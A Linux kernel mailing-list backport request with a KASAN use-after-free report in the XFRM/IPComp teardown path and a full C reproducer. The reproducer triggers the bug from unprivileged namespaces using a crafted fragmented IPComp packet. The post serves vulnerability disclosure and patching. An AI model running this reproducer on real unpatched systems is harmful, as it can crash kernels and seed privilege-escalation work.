Hi all,
Just a gentle follow-up on this backport request with kasan report and reproducer.
KASAN Report: BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:988= [inline] BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:= 516 [inline] BUG: KASAN: slab-use-after-free in __xfrm_state_delete+0x7bb/0x8e0 = net/xfrm/xfrm_state.c:761 Write of size 8 at addr ffff88802eba0418 by task kworker/0:5/397627
CPU: 0 UID: 0 PID: 397627 Comm: kworker/0:5 Tainted: 6.12.51 #2 Tainted: [W]=WARN Workqueue: events xfrm_state_gc_task Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xd7/0x130 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc4/0x640 mm/kasan/report.c:481 kasan_report+0xd8/0x110 mm/kasan/report.c:594 __hlist_del include/linux/list.h:988 [inline] hlist_del_rcu include/linux/rculist.h:516 [inline] __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761 xfrm_state_delete net/xfrm/xfrm_state.c:795 [inline] xfrm_state_delete_tunnel+0x17c/0x1b0 net/xfrm/xfrm_state.c:3014 ipcomp_destroy+0x4a/0xc0 net/xfrm/xfrm_ipcomp.c:318 ___xfrm_state_destroy+0x252/0x5c0 net/xfrm/xfrm_state.c:549 xfrm_state_gc_task+0x111/0x180 net/xfrm/xfrm_state.c:572 process_one_work+0x8e3/0x1930 kernel/workqueue.c:3229 process_scheduled_works kernel/workqueue.c:3310 [inline] worker_thread+0x781/0x10a0 kernel/workqueue.c:3391 kthread+0x2fa/0x400 kernel/kthread.c:389 ret_from_fork+0x4a/0x80 arch/x86/kernel/process.c:152 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK>
Allocated by task 9: kasan_save_stack+0x33/0x60 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:377 [inline] __kasan_kmalloc+0x8f/0xa0 mm/kasan/common.c:394 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4313 [inline] __kmalloc_noprof+0x219/0x530 mm/slub.c:4325 kmalloc_noprof include/linux/slab.h:882 [inline] kzalloc_noprof include/linux/slab.h:1014 [inline] xfrm_hash_alloc+0xd6/0x100 net/xfrm/xfrm_hash.c:21 xfrm_hash_resize+0x66/0x2310 net/xfrm/xfrm_state.c:170 [...]
Freed by task 30: kasan_save_stack+0x33/0x60 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:579 poison_slab_object mm/kasan/common.c:247 [inline] __kasan_slab_free+0x37/0x50 mm/kasan/common.c:264 kasan_slab_free include/linux/kasan.h:233 [inline] slab_free_hook mm/slub.c:2374 [inline] slab_free mm/slub.c:4632 [inline] kfree+0x14a/0x4a0 mm/slub.c:4780 xfrm_hash_free+0xc1/0xe0 net/xfrm/xfrm_hash.c:35 xfrm_state_fini+0x226/0x310 net/xfrm/xfrm_state.c:3233 xfrm_net_exit+0x32/0x70 net/xfrm/xfrm_policy.c:4342 ops_exit_list+0xb5/0x180 net/core/net_namespace.c:173 cleanup_net+0x5b8/0xb20 net/core/net_namespace.c:642 [...]
2. Reproducer The C reproducer is pasted below.
Given that this UAF is reproducible and reachable from unprivileged= namespaces (if unshare is allowed), I suggest backporting commit = b441cf3f8c4b to all active LTS branches.
Thanks, Slavin Liu
--- repro.c:
// gcc repro.c -o poc -lz #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <linux/xfrm.h> #include <net/if.h> #include <netinet/in.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <netinet/ip.h> #include <zlib.h>
// =-=-=-=-=-=-=-= CONFIG =-=-=-=-=-=-=-= #define SPI 0x1100 #define TUNNEL_SRC "172.16.22.148" #define TUNNEL_DST "172.16.194.141"
// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-= #define die(msg) do { perror(msg); exit(EXIT_FAILURE); } while(0)
void write_file(const char * filename, const char * buf) { int fd = open(filename, O_WRONLY | O_CLOEXEC); if (fd < 0) die("open"); if (write(fd, buf, strlen(buf)) != strlen(buf)) die("write"); close(fd); }
/* * Create a new user and network namespace. * This allows an unprivileged user to configure XFRM interfaces and rules. */ static void init_namespace() { char uid_map[128]; char gid_map[128]; uid_t uid = getuid(); gid_t gid = getgid();
if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC)) die("unshare");
sprintf(uid_map, "0 %d 1\n", uid); sprintf(gid_map, "0 %d 1\n", gid);
write_file("/proc/self/uid_map", uid_map); write_file("/proc/self/setgroups", "deny"); write_file("/proc/self/gid_map", gid_map); }
static void bring_interface_up(const char *ifname) { int sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) die("socket");
struct ifreq ifr; memset(&ifr, 0, sizeof ifr); strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) die("SIOCGIFFLAGS"); ifr.ifr_flags |= IFF_UP; if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) die("SIOCSIFFLAGS"); close(sockfd); }
// =-=-=-=-=-=-=-= XFRM UTILS =-=-=-=-=-=-=-= int nlfd;
/* * Helper to add IP addresses using netlink */ int add_ip_address(const char *ifname, const char *ip, int prefix_len) { struct { struct nlmsghdr n; struct ifaddrmsg ifa; char buf[256]; } req;
struct sockaddr_nl nladdr; struct rtattr *rta; int sockfd; int ifindex; struct in_addr addr;
ifindex = if_nametoindex(ifname); if (ifindex == 0) die("if_nametoindex");
if (inet_pton(AF_INET, ip, &addr) != 1) die("Invalid IP address");
sockfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); if (sockfd < 0) die("socket");
memset(&req, 0, sizeof(req)); req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg)); req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK; req.n.nlmsg_type = RTM_NEWADDR;
req.ifa.ifa_family = AF_INET; req.ifa.ifa_prefixlen = prefix_len; req.ifa.ifa_flags = IFA_F_PERMANENT; req.ifa.ifa_scope = RT_SCOPE_UNIVERSE; req.ifa.ifa_index = ifindex;
rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.n.nlmsg_len)); rta->rta_type = IFA_LOCAL; rta->rta_len = RTA_LENGTH(sizeof(addr)); memcpy(RTA_DATA(rta), &addr, sizeof(addr)); req.n.nlmsg_len = NLMSG_ALIGN(req.n.nlmsg_len) + rta->rta_len;
memset(&nladdr, 0, sizeof(nladdr)); nladdr.nl_family = AF_NETLINK;
if (sendto(sockfd, &req, req.n.nlmsg_len, 0, (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) die("sendto");
char buf[4096]; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; int len = recv(sockfd, buf, sizeof(buf), 0);
if (len < 0) die("recv");
if (nlh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(nlh); if (err->error != 0) die("Netlink error"); }
close(sockfd); return 0; }
static void configure_lo() { add_ip_address("lo", "10.0.0.0", 8); add_ip_address("lo", "172.16.0.0", 12);
write_file("/proc/sys/net/ipv4/conf/lo/rp_filter", "0"); write_file("/proc/sys/net/ipv4/conf/all/rp_filter", "0");
write_file("/proc/sys/net/ipv4/conf/lo/accept_local", "1"); write_file("/proc/sys/net/ipv4/conf/all/accept_local", "1");
// Enable xfrm on lo to allow IPComp processing write_file("/proc/sys/net/ipv4/conf/lo/disable_xfrm", "0\n"); write_file("/proc/sys/net/ipv4/conf/lo/disable_policy", "0\n"); }
static int nl_open_xfrm(void) { int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (fd < 0) die("socket");
struct sockaddr_nl addr = { .nl_family = AF_NETLINK, .nl_pid = (uint32_t)getpid() }; if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) die("bind");
struct sockaddr_nl kern = { .nl_family = AF_NETLINK, .nl_pid = 0 }; if (connect(fd, (struct sockaddr *)&kern, sizeof(kern)) < 0) die("connect");
return fd; }
/* * Constructs an IPComp XFRM state in Tunnel Mode. * CRITICAL: This causes the kernel to allocate 'x->tunnel'. */ static void xfrm_add_sa_tunnel_ipcomp_v4(uint32_t saddr_be, uint32_t daddr_be, uint32_t spi_be, uint32_t tunnel_src_be, uint32_t tunnel_dst_be) { char req[NLMSG_SPACE(sizeof(struct xfrm_usersa_info)) + NLA_ALIGN(NLA_HDRLEN + sizeof(struct xfrm_algo) + 0)]; memset(req, 0, sizeof(req));
struct nlmsghdr *nlh = (struct nlmsghdr *)req; struct xfrm_usersa_info *sa = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*sa)); nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = 1; nlh->nlmsg_pid = (uint32_t)getpid();
memset(sa, 0, sizeof(*sa)); sa->id.proto = IPPROTO_COMP; sa->id.spi = spi_be; sa->mode = XFRM_MODE_TUNNEL; sa->id.daddr.a4 = tunnel_dst_be; sa->saddr.a4 = tunnel_src_be; sa->sel.family = AF_INET; sa->sel.daddr.a4 = daddr_be; sa->sel.saddr.a4 = saddr_be; sa->sel.prefixlen_d = 32; sa->sel.prefixlen_s = 32; sa->family = AF_INET; sa->replay_window = 0; sa->lft.soft_byte_limit = sa->lft.hard_byte_limit = XFRM_INF; sa->lft.soft_packet_limit = sa->lft.hard_packet_limit = XFRM_INF; sa->lft.soft_add_expires_seconds = sa->lft.hard_add_expires_seconds = XFRM_INF; sa->lft.soft_use_expires_seconds = sa->lft.hard_use_expires_seconds = XFRM_INF;
struct nlattr *nla = (struct nlattr *)((char*)nlh + NLMSG_ALIGN(nlh->nlmsg_len)); struct xfrm_algo *algo = (struct xfrm_algo *)((char*)nla + NLA_HDRLEN);
nla->nla_type = XFRMA_ALG_COMP; nla->nla_len = NLA_HDRLEN + sizeof(*algo);
memset(algo, 0, sizeof(*algo)); snprintf(algo->alg_name, sizeof(algo->alg_name), "%s", "deflate"); algo->alg_key_len = 0;
nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + NLA_ALIGN(nla->nla_len);
if (send(nlfd, nlh, nlh->nlmsg_len, 0) < 0) die("send"); }
void setup_xfrm_env() { init_namespace(); bring_interface_up("lo"); configure_lo(); nlfd = nl_open_xfrm(); if (nlfd < 0) die("nl_open_xfrm"); }
// =-=-=-=-=-=-=-= PACKET CONSTRUCTION =-=-=-=-=-=-=-=
uint16_t ip_checksum(struct iphdr *iph) { uint32_t sum = 0; uint16_t *ptr = (uint16_t*)iph; int len = iph->ihl * 4;
while (len > 1) { sum += *ptr++; len -= 2; } if (len == 1) sum += *(uint8_t*)ptr;
sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; }
struct ipcomp_hdr { uint8_t nexthdr; uint8_t flags; uint16_t cpi; };
static int deflate_raw(const void *in, size_t in_len, void *out, size_t *out_len) { z_stream strm; memset(&strm, 0, sizeof(strm)); int ret = deflateInit2(&strm, Z_DEFAULT_COMPRESSION, Z_DEFLATED, -15, // raw deflate (no zlib header) 8, Z_DEFAULT_STRATEGY); if (ret != Z_OK) return -1;
strm.next_in = (Bytef *)in; strm.avail_in = (uInt)in_len; strm.next_out = (Bytef *)out; strm.avail_out= (uInt)*out_len;
ret = deflate(&strm, Z_FINISH); if (ret != Z_STREAM_END) { deflateEnd(&strm); return -1; }
*out_len = strm.total_out; deflateEnd(&strm); return 0; }
static size_t build_inner_ipv4_packet(uint8_t *buf, size_t buf_cap, const char *src, const char *dst, uint16_t id, uint8_t proto, uint16_t frag_flags_off, const void *payload, size_t payload_len) { if (buf_cap < sizeof(struct iphdr) + payload_len) return 0;
struct iphdr *iph = (struct iphdr *)buf; memset(iph, 0, sizeof(*iph)); iph->version = 4; iph->ihl = 5; iph->tos = 0; iph->tot_len = htons(sizeof(struct iphdr) + payload_len); iph->id = htons(id); iph->frag_off = htons(frag_flags_off); iph->ttl = 64; iph->protocol = proto; iph->saddr = inet_addr(src); iph->daddr = inet_addr(dst); iph->check = 0; iph->check = ip_checksum(iph);
memcpy(buf + sizeof(struct iphdr), payload, payload_len); return sizeof(struct iphdr) + payload_len; }
#define INNER_PAY_SZ 1400
/* * Sends a crafted packet: * Outer: IP -> IPComp (Tunnel Mode) * Inner: IP (Fragmented) -> UDP * * This forces the packet to enter the reassembly queue (gro_cells_receive) * after decompression, holding a ref to the IPComp state. */ void trigger_fragment_with_secpath() { int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sock < 0) die("socket");
int one = 1; if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) die("setsockopt IP_HDRINCL");
// 1. Construct Inner IPv4 Packet (Fragmented: IP_MF set) uint8_t inner_payload[INNER_PAY_SZ]; memset(inner_payload, 0xAA, sizeof(inner_payload));
const uint16_t INNER_ID = 0x5678; const uint16_t INNER_FRAG_OFFSET = 1400; // bytes // Set More Fragments (IP_MF) to ensure it stays in reassembly queue const uint16_t inner_frag_off_field = IP_MF | (INNER_FRAG_OFFSET >> 3);
uint8_t inner_packet[sizeof(struct iphdr) + INNER_PAY_SZ]; size_t inner_packet_len = build_inner_ipv4_packet( inner_packet, sizeof(inner_packet), "10.0.0.2", "10.0.0.1", INNER_ID, IPPROTO_UDP, inner_frag_off_field, inner_payload, sizeof(inner_payload) ); if (!inner_packet_len) die("inner packet too big");
// 2. Compress the inner packet (IPComp payload) uint8_t comp_buf[sizeof(inner_packet) + 128]; size_t comp_len = sizeof(comp_buf); if (deflate_raw(inner_packet, inner_packet_len, comp_buf, &comp_len) != 0) { die("deflate_raw failed"); }
// 3. Build outer packet: [outer IP][IPCOMP][compressed bytes] uint8_t packet[sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + sizeof(comp_buf)]; struct iphdr *outer_iph = (struct iphdr *)packet;
outer_iph->version = 4; outer_iph->ihl = 5; outer_iph->tos = 0; size_t outer_len = sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + comp_len; outer_iph->tot_len = htons(outer_len); outer_iph->id = htons(0x1234); outer_iph->frag_off= htons(IP_DF); outer_iph->ttl = 64; outer_iph->protocol= IPPROTO_COMP; // Trigger XFRM Input outer_iph->saddr = inet_addr(TUNNEL_SRC); outer_iph->daddr = inet_addr(TUNNEL_DST); outer_iph->check = 0;
struct ipcomp_hdr *ipcomp = (struct ipcomp_hdr *)(packet + sizeof(struct iphdr)); ipcomp->nexthdr = IPPROTO_IPIP; // decompressed payload is an IPv4 packet ipcomp->flags = 0; ipcomp->cpi = htons(SPI);
memcpy(packet + sizeof(struct iphdr) + sizeof(struct ipcomp_hdr), comp_buf, comp_len);
outer_iph->check = ip_checksum(outer_iph);
struct sockaddr_in dest = { .sin_family = AF_INET, .sin_addr.s_addr = inet_addr(TUNNEL_DST) };
if (sendto(sock, packet, outer_len, 0, (struct sockaddr*)&dest, sizeof(dest)) < 0) { die("sendto"); } close(sock); }
// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=
int main(int argc, char **argv) { printf("[*] Starting UAF Trigger Loop...\n"); printf("[*] Ctrl+C to stop.\n");
while (1) { // Fork a child process to run the trigger logic if (!fork()) { // Child Process:
// 1. Create isolated namespace setup_xfrm_env();
uint32_t inner_src = inet_addr("10.0.0.1"); uint32_t inner_dst = inet_addr("10.0.0.2"); uint32_t tunnel_src = inet_addr(TUNNEL_SRC); uint32_t tunnel_dst = inet_addr(TUNNEL_DST); uint32_t spi = htonl(SPI);
// 2. Add IPComp State (allocates x->tunnel) xfrm_add_sa_tunnel_ipcomp_v4(inner_src, inner_dst, spi, tunnel_src, tunnel_dst);
// 3. Send packet to sit in reassembly queue (holds ref to xfrm_state) trigger_fragment_with_secpath();
// 4. Exit immediately. // This triggers netns teardown: // -> ipv4_frags_exit_net (stops reassembly, schedules free work) // -> xfrm_net_exit (flushes state, freeing xfrm_hash) // If xfrm_state_fini() happens before skb in reassembly get // destroyed -> UAF. exit(0); }
// Wait for child's netns cleanup to finish waitpid(-1, NULL, 0); sleep(1); }
return 0; }